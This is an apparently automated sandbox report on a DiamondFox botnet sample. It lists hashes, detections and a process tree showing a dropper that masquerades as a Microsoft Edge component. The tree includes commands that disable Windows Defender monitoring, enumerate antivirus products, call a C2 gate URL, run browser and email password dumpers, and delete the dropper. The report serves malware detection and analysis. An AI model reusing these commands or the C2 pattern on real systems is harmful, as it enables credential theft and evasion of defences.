Analysis
-
max time kernel
133s -
max time network
164s -
platform
windows7_x64 -
resource
win7v20210410 -
submitted
04/07/2021, 12:03
Static task
static1
Behavioral task
behavioral1
Sample
2d64df6be5fbabdd41d304644e18d6dcab3d1a889df58fa962111e1c76ad2215.exe
Resource
win7v20210410
Behavioral task
behavioral2
Sample
2d64df6be5fbabdd41d304644e18d6dcab3d1a889df58fa962111e1c76ad2215.exe
Resource
win10v20210408
General
-
Target
2d64df6be5fbabdd41d304644e18d6dcab3d1a889df58fa962111e1c76ad2215.exe
-
Size
203KB
-
MD5
a1e165e1926c0c83123c89fce6b1af56
-
SHA1
281246ba4b852a5f62e032424f7816f5a6b0406f
-
SHA256
2d64df6be5fbabdd41d304644e18d6dcab3d1a889df58fa962111e1c76ad2215
-
SHA512
28e2081e6249378e7f81e46e8e4afc93828adca7cf51316e7060655a60b2ee90b6f22af0b45a23299368d821816a64bc9d02d18f69d296047604f51b12eba354
Malware Config
Signatures
-
DiamondFox
DiamondFox is a multipurpose botnet with many capabilities.
-
DiamondFox payload 18 IoCs
Detects DiamondFox payload in file/memory.
resource yara_rule behavioral1/files/0x00040000000130e2-60.dat diamondfox behavioral1/files/0x00040000000130e2-61.dat diamondfox behavioral1/files/0x00040000000130e2-63.dat diamondfox behavioral1/files/0x00040000000130e2-74.dat diamondfox behavioral1/files/0x00040000000130e2-73.dat diamondfox behavioral1/files/0x00040000000130e2-136.dat diamondfox behavioral1/files/0x00040000000130e2-141.dat diamondfox behavioral1/files/0x00040000000130e2-148.dat diamondfox behavioral1/files/0x00040000000130e2-153.dat diamondfox behavioral1/files/0x00040000000130e2-158.dat diamondfox behavioral1/files/0x00040000000130e2-161.dat diamondfox behavioral1/files/0x00040000000130e2-170.dat diamondfox behavioral1/files/0x00040000000130e2-175.dat diamondfox behavioral1/files/0x00040000000130e2-180.dat diamondfox behavioral1/files/0x00040000000130e2-186.dat diamondfox behavioral1/files/0x00040000000130e2-187.dat diamondfox behavioral1/files/0x00040000000130e2-188.dat diamondfox behavioral1/files/0x00040000000130e2-189.dat diamondfox -
NirSoft MailPassView 3 IoCs
Password recovery tool for various email clients
resource yara_rule behavioral1/memory/976-151-0x0000000000400000-0x0000000000455000-memory.dmp MailPassView behavioral1/memory/976-152-0x000000000044412E-mapping.dmp MailPassView behavioral1/memory/976-155-0x0000000000400000-0x0000000000455000-memory.dmp MailPassView -
NirSoft WebBrowserPassView 3 IoCs
Password recovery tool for various web browsers
resource yara_rule behavioral1/memory/836-134-0x0000000000400000-0x000000000047C000-memory.dmp WebBrowserPassView behavioral1/memory/836-135-0x00000000004466F4-mapping.dmp WebBrowserPassView behavioral1/memory/836-138-0x0000000000400000-0x000000000047C000-memory.dmp WebBrowserPassView -
Nirsoft 8 IoCs
resource yara_rule behavioral1/memory/836-134-0x0000000000400000-0x000000000047C000-memory.dmp Nirsoft behavioral1/memory/836-135-0x00000000004466F4-mapping.dmp Nirsoft behavioral1/memory/836-138-0x0000000000400000-0x000000000047C000-memory.dmp Nirsoft behavioral1/memory/1596-146-0x0000000000400000-0x0000000000422000-memory.dmp Nirsoft behavioral1/memory/1596-150-0x0000000000400000-0x0000000000422000-memory.dmp Nirsoft behavioral1/memory/976-151-0x0000000000400000-0x0000000000455000-memory.dmp Nirsoft behavioral1/memory/976-152-0x000000000044412E-mapping.dmp Nirsoft behavioral1/memory/976-155-0x0000000000400000-0x0000000000455000-memory.dmp Nirsoft -
Executes dropped EXE 10 IoCs
pid Process 316 MicrosoftEdgeCPS.exe 836 MicrosoftEdgeCPS.exe 2032 MicrosoftEdgeCPS.exe 1596 MicrosoftEdgeCPS.exe 976 MicrosoftEdgeCPS.exe 956 MicrosoftEdgeCPS.exe 540 MicrosoftEdgeCPS.exe 1776 MicrosoftEdgeCPS.exe 1500 MicrosoftEdgeCPS.exe 1148 MicrosoftEdgeCPS.exe -
Deletes itself 1 IoCs
pid Process 1660 powershell.exe -
Loads dropped DLL 7 IoCs
pid Process 1036 2d64df6be5fbabdd41d304644e18d6dcab3d1a889df58fa962111e1c76ad2215.exe 1036 2d64df6be5fbabdd41d304644e18d6dcab3d1a889df58fa962111e1c76ad2215.exe 316 MicrosoftEdgeCPS.exe 548 WerFault.exe 548 WerFault.exe 548 WerFault.exe 548 WerFault.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Suspicious use of SetThreadContext 9 IoCs
description pid Process procid_target PID 316 set thread context of 836 316 MicrosoftEdgeCPS.exe 50 PID 316 set thread context of 2032 316 MicrosoftEdgeCPS.exe 51 PID 316 set thread context of 1596 316 MicrosoftEdgeCPS.exe 52 PID 316 set thread context of 976 316 MicrosoftEdgeCPS.exe 53 PID 316 set thread context of 956 316 MicrosoftEdgeCPS.exe 54 PID 316 set thread context of 540 316 MicrosoftEdgeCPS.exe 57 PID 316 set thread context of 1776 316 MicrosoftEdgeCPS.exe 58 PID 316 set thread context of 1500 316 MicrosoftEdgeCPS.exe 59 PID 316 set thread context of 1148 316 MicrosoftEdgeCPS.exe 60 -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 1 IoCs
pid pid_target Process procid_target 548 1148 WerFault.exe 60 -
Opens file in notepad (likely ransom note) 1 IoCs
pid Process 1636 notepad.exe -
Suspicious behavior: EnumeratesProcesses 15 IoCs
pid Process 1660 powershell.exe 1612 powershell.exe 1660 powershell.exe 1612 powershell.exe 316 MicrosoftEdgeCPS.exe 836 MicrosoftEdgeCPS.exe 836 MicrosoftEdgeCPS.exe 1148 MicrosoftEdgeCPS.exe 316 MicrosoftEdgeCPS.exe 548 WerFault.exe 548 WerFault.exe 548 WerFault.exe 548 WerFault.exe 548 WerFault.exe 316 MicrosoftEdgeCPS.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 1660 powershell.exe Token: SeDebugPrivilege 1612 powershell.exe Token: SeIncreaseQuotaPrivilege 288 wmic.exe Token: SeSecurityPrivilege 288 wmic.exe Token: SeTakeOwnershipPrivilege 288 wmic.exe Token: SeLoadDriverPrivilege 288 wmic.exe Token: SeSystemProfilePrivilege 288 wmic.exe Token: SeSystemtimePrivilege 288 wmic.exe Token: SeProfSingleProcessPrivilege 288 wmic.exe Token: SeIncBasePriorityPrivilege 288 wmic.exe Token: SeCreatePagefilePrivilege 288 wmic.exe Token: SeBackupPrivilege 288 wmic.exe Token: SeRestorePrivilege 288 wmic.exe Token: SeShutdownPrivilege 288 wmic.exe Token: SeDebugPrivilege 288 wmic.exe Token: SeSystemEnvironmentPrivilege 288 wmic.exe Token: SeRemoteShutdownPrivilege 288 wmic.exe Token: SeUndockPrivilege 288 wmic.exe Token: SeManageVolumePrivilege 288 wmic.exe Token: 33 288 wmic.exe Token: 34 288 wmic.exe Token: 35 288 wmic.exe Token: SeIncreaseQuotaPrivilege 288 wmic.exe Token: SeSecurityPrivilege 288 wmic.exe Token: SeTakeOwnershipPrivilege 288 wmic.exe Token: SeLoadDriverPrivilege 288 wmic.exe Token: SeSystemProfilePrivilege 288 wmic.exe Token: SeSystemtimePrivilege 288 wmic.exe Token: SeProfSingleProcessPrivilege 288 wmic.exe Token: SeIncBasePriorityPrivilege 288 wmic.exe Token: SeCreatePagefilePrivilege 288 wmic.exe Token: SeBackupPrivilege 288 wmic.exe Token: SeRestorePrivilege 288 wmic.exe Token: SeShutdownPrivilege 288 wmic.exe Token: SeDebugPrivilege 288 wmic.exe Token: SeSystemEnvironmentPrivilege 288 wmic.exe Token: SeRemoteShutdownPrivilege 288 wmic.exe Token: SeUndockPrivilege 288 wmic.exe Token: SeManageVolumePrivilege 288 wmic.exe Token: 33 288 wmic.exe Token: 34 288 wmic.exe Token: 35 288 wmic.exe Token: SeIncreaseQuotaPrivilege 1336 wmic.exe Token: SeSecurityPrivilege 1336 wmic.exe Token: SeTakeOwnershipPrivilege 1336 wmic.exe Token: SeLoadDriverPrivilege 1336 wmic.exe Token: SeSystemProfilePrivilege 1336 wmic.exe Token: SeSystemtimePrivilege 1336 wmic.exe Token: SeProfSingleProcessPrivilege 1336 wmic.exe Token: SeIncBasePriorityPrivilege 1336 wmic.exe Token: SeCreatePagefilePrivilege 1336 wmic.exe Token: SeBackupPrivilege 1336 wmic.exe Token: SeRestorePrivilege 1336 wmic.exe Token: SeShutdownPrivilege 1336 wmic.exe Token: SeDebugPrivilege 1336 wmic.exe Token: SeSystemEnvironmentPrivilege 1336 wmic.exe Token: SeRemoteShutdownPrivilege 1336 wmic.exe Token: SeUndockPrivilege 1336 wmic.exe Token: SeManageVolumePrivilege 1336 wmic.exe Token: 33 1336 wmic.exe Token: 34 1336 wmic.exe Token: 35 1336 wmic.exe Token: SeIncreaseQuotaPrivilege 1336 wmic.exe Token: SeSecurityPrivilege 1336 wmic.exe -
Suspicious use of SetWindowsHookEx 3 IoCs
pid Process 2032 MicrosoftEdgeCPS.exe 540 MicrosoftEdgeCPS.exe 1776 MicrosoftEdgeCPS.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 1036 wrote to memory of 316 1036 2d64df6be5fbabdd41d304644e18d6dcab3d1a889df58fa962111e1c76ad2215.exe 29 PID 1036 wrote to memory of 316 1036 2d64df6be5fbabdd41d304644e18d6dcab3d1a889df58fa962111e1c76ad2215.exe 29 PID 1036 wrote to memory of 316 1036 2d64df6be5fbabdd41d304644e18d6dcab3d1a889df58fa962111e1c76ad2215.exe 29 PID 1036 wrote to memory of 316 1036 2d64df6be5fbabdd41d304644e18d6dcab3d1a889df58fa962111e1c76ad2215.exe 29 PID 1036 wrote to memory of 1660 1036 2d64df6be5fbabdd41d304644e18d6dcab3d1a889df58fa962111e1c76ad2215.exe 30 PID 1036 wrote to memory of 1660 1036 2d64df6be5fbabdd41d304644e18d6dcab3d1a889df58fa962111e1c76ad2215.exe 30 PID 1036 wrote to memory of 1660 1036 2d64df6be5fbabdd41d304644e18d6dcab3d1a889df58fa962111e1c76ad2215.exe 30 PID 1036 wrote to memory of 1660 1036 2d64df6be5fbabdd41d304644e18d6dcab3d1a889df58fa962111e1c76ad2215.exe 30 PID 316 wrote to memory of 1612 316 MicrosoftEdgeCPS.exe 31 PID 316 wrote to memory of 1612 316 MicrosoftEdgeCPS.exe 31 PID 316 wrote to memory of 1612 316 MicrosoftEdgeCPS.exe 31 PID 316 wrote to memory of 1612 316 MicrosoftEdgeCPS.exe 31 PID 316 wrote to memory of 288 316 MicrosoftEdgeCPS.exe 35 PID 316 wrote to memory of 288 316 MicrosoftEdgeCPS.exe 35 PID 316 wrote to memory of 288 316 MicrosoftEdgeCPS.exe 35 PID 316 wrote to memory of 288 316 MicrosoftEdgeCPS.exe 35 PID 316 wrote to memory of 1336 316 MicrosoftEdgeCPS.exe 37 PID 316 wrote to memory of 1336 316 MicrosoftEdgeCPS.exe 37 PID 316 wrote to memory of 1336 316 MicrosoftEdgeCPS.exe 37 PID 316 wrote to memory of 1336 316 MicrosoftEdgeCPS.exe 37 PID 316 wrote to memory of 756 316 MicrosoftEdgeCPS.exe 40 PID 316 wrote to memory of 756 316 MicrosoftEdgeCPS.exe 40 PID 316 wrote to memory of 756 316 MicrosoftEdgeCPS.exe 40 PID 316 wrote to memory of 756 316 MicrosoftEdgeCPS.exe 40 PID 316 wrote to memory of 1348 316 MicrosoftEdgeCPS.exe 42 PID 316 wrote to memory of 1348 316 MicrosoftEdgeCPS.exe 42 PID 316 wrote to memory of 1348 316 MicrosoftEdgeCPS.exe 42 PID 316 wrote to memory of 1348 316 MicrosoftEdgeCPS.exe 42 PID 316 wrote to memory of 332 316 MicrosoftEdgeCPS.exe 44 PID 316 wrote to memory of 332 316 MicrosoftEdgeCPS.exe 44 PID 316 wrote to memory of 332 316 MicrosoftEdgeCPS.exe 44 PID 316 wrote to memory of 332 316 MicrosoftEdgeCPS.exe 44 PID 316 wrote to memory of 960 316 MicrosoftEdgeCPS.exe 46 PID 316 wrote to memory of 960 316 MicrosoftEdgeCPS.exe 46 PID 316 wrote to memory of 960 316 MicrosoftEdgeCPS.exe 46 PID 316 wrote to memory of 960 316 MicrosoftEdgeCPS.exe 46 PID 316 wrote to memory of 1812 316 MicrosoftEdgeCPS.exe 49 PID 316 wrote to memory of 1812 316 MicrosoftEdgeCPS.exe 49 PID 316 wrote to memory of 1812 316 MicrosoftEdgeCPS.exe 49 PID 316 wrote to memory of 1812 316 MicrosoftEdgeCPS.exe 49 PID 316 wrote to memory of 836 316 MicrosoftEdgeCPS.exe 50 PID 316 wrote to memory of 836 316 MicrosoftEdgeCPS.exe 50 PID 316 wrote to memory of 836 316 MicrosoftEdgeCPS.exe 50 PID 316 wrote to memory of 836 316 MicrosoftEdgeCPS.exe 50 PID 316 wrote to memory of 836 316 MicrosoftEdgeCPS.exe 50 PID 316 wrote to memory of 836 316 MicrosoftEdgeCPS.exe 50 PID 316 wrote to memory of 836 316 MicrosoftEdgeCPS.exe 50 PID 316 wrote to memory of 836 316 MicrosoftEdgeCPS.exe 50 PID 316 wrote to memory of 836 316 MicrosoftEdgeCPS.exe 50 PID 316 wrote to memory of 836 316 MicrosoftEdgeCPS.exe 50 PID 316 wrote to memory of 2032 316 MicrosoftEdgeCPS.exe 51 PID 316 wrote to memory of 2032 316 MicrosoftEdgeCPS.exe 51 PID 316 wrote to memory of 2032 316 MicrosoftEdgeCPS.exe 51 PID 316 wrote to memory of 2032 316 MicrosoftEdgeCPS.exe 51 PID 316 wrote to memory of 2032 316 MicrosoftEdgeCPS.exe 51 PID 316 wrote to memory of 2032 316 MicrosoftEdgeCPS.exe 51 PID 316 wrote to memory of 2032 316 MicrosoftEdgeCPS.exe 51 PID 316 wrote to memory of 2032 316 MicrosoftEdgeCPS.exe 51 PID 316 wrote to memory of 1596 316 MicrosoftEdgeCPS.exe 52 PID 316 wrote to memory of 1596 316 MicrosoftEdgeCPS.exe 52 PID 316 wrote to memory of 1596 316 MicrosoftEdgeCPS.exe 52 PID 316 wrote to memory of 1596 316 MicrosoftEdgeCPS.exe 52 PID 316 wrote to memory of 1596 316 MicrosoftEdgeCPS.exe 52 PID 316 wrote to memory of 1596 316 MicrosoftEdgeCPS.exe 52
Processes
-
C:\Users\Admin\AppData\Local\Temp\2d64df6be5fbabdd41d304644e18d6dcab3d1a889df58fa962111e1c76ad2215.exe"C:\Users\Admin\AppData\Local\Temp\2d64df6be5fbabdd41d304644e18d6dcab3d1a889df58fa962111e1c76ad2215.exe"1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1036 -
C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exe"C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exe"2⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:316 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Set-MpPreference -DisableRealtimeMonitoring 13⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1612
-
-
C:\Windows\SysWOW64\Wbem\wmic.exe"wmic" /Node:localhost /Namespace:\\root\SecurityCenter2 path AntiVirusProduct get DisplayName /FORMAT:List3⤵
- Suspicious use of AdjustPrivilegeToken
PID:288
-
-
C:\Windows\SysWOW64\Wbem\wmic.exe"wmic" os get caption /FORMAT:List3⤵
- Suspicious use of AdjustPrivilegeToken
PID:1336
-
-
C:\Windows\SysWOW64\Wbem\wmic.exe"wmic" path win32_VideoController get caption /FORMAT:List3⤵PID:756
-
-
C:\Windows\SysWOW64\Wbem\wmic.exe"wmic" path win32_NetworkAdapterConfiguration where IPEnabled=1 get IPAddress /FORMAT:List3⤵PID:1348
-
-
C:\Windows\SysWOW64\Wbem\wmic.exe"wmic" LogicalDisk Where DriveType=4 get VolumeName /FORMAT:List3⤵PID:332
-
-
C:\Windows\SysWOW64\Wbem\wmic.exe"wmic" path win32_PingStatus where address='diamond.serivice.com' get StatusCode /FORMAT:List3⤵PID:960
-
-
C:\Windows\SysWOW64\Wbem\wmic.exe"wmic" path win32_PingStatus where address='diamond.serivice.com' get ResponseTime /FORMAT:List3⤵PID:1812
-
-
C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exe/scomma "C:\Users\Admin\AppData\Local\Temp\1.log"3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:836
-
-
C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exe/scomma "C:\Users\Admin\AppData\Local\Temp\4.log"3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:2032
-
-
C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exe/scomma "C:\Users\Admin\AppData\Local\Temp\2.log"3⤵
- Executes dropped EXE
PID:1596
-
-
C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exe/scomma "C:\Users\Admin\AppData\Local\Temp\3.log"3⤵
- Executes dropped EXE
PID:976
-
-
C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exeX http://diamond.serivice.com/panel/gate.php*Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.141 Safari/537.36 Vivaldi/3.5*f272b772399b50913c7637633c5ac5d83⤵
- Executes dropped EXE
PID:956 -
C:\Windows\notepad.exeX C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exe4⤵
- Opens file in notepad (likely ransom note)
PID:1636
-
-
C:\Windows\write.exeX C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exe4⤵PID:1516
-
-
-
C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exeX http://diamond.serivice.com/panel/gate.php*Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.141 Safari/537.36 Vivaldi/3.5*f272b772399b50913c7637633c5ac5d83⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:540
-
-
C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exeX http://diamond.serivice.com/panel/gate.php*Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.141 Safari/537.36 Vivaldi/3.5*f272b772399b50913c7637633c5ac5d83⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:1776
-
-
C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exeX http://diamond.serivice.com/panel/gate.php*Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.141 Safari/537.36 Vivaldi/3.5*f272b772399b50913c7637633c5ac5d83⤵
- Executes dropped EXE
PID:1500
-
-
C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exeX http://diamond.serivice.com/panel/gate.php*Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.141 Safari/537.36 Vivaldi/3.5*f272b772399b50913c7637633c5ac5d83⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:1148 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1148 -s 2764⤵
- Loads dropped DLL
- Program crash
- Suspicious behavior: EnumeratesProcesses
PID:548
-
-
-
C:\Windows\SysWOW64\Wbem\wmic.exe"wmic" path win32_PingStatus where address='diamond.serivice.com' get StatusCode /FORMAT:List3⤵PID:844
-
-
C:\Windows\SysWOW64\Wbem\wmic.exe"wmic" path win32_PingStatus where address='diamond.serivice.com' get ResponseTime /FORMAT:List3⤵PID:1832
-
-
C:\Windows\SysWOW64\Wbem\wmic.exe"wmic" path win32_PingStatus where address='diamond.serivice.com' get StatusCode /FORMAT:List3⤵PID:1060
-
-
C:\Windows\SysWOW64\Wbem\wmic.exe"wmic" path win32_PingStatus where address='diamond.serivice.com' get ResponseTime /FORMAT:List3⤵PID:804
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"powershell" Start-Sleep -s 10; Remove-Item -Path 'C:\Users\Admin\AppData\Local\Temp\2d64df6be5fbabdd41d304644e18d6dcab3d1a889df58fa962111e1c76ad2215.exe' -Force -Recurse2⤵
- Deletes itself
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1660
-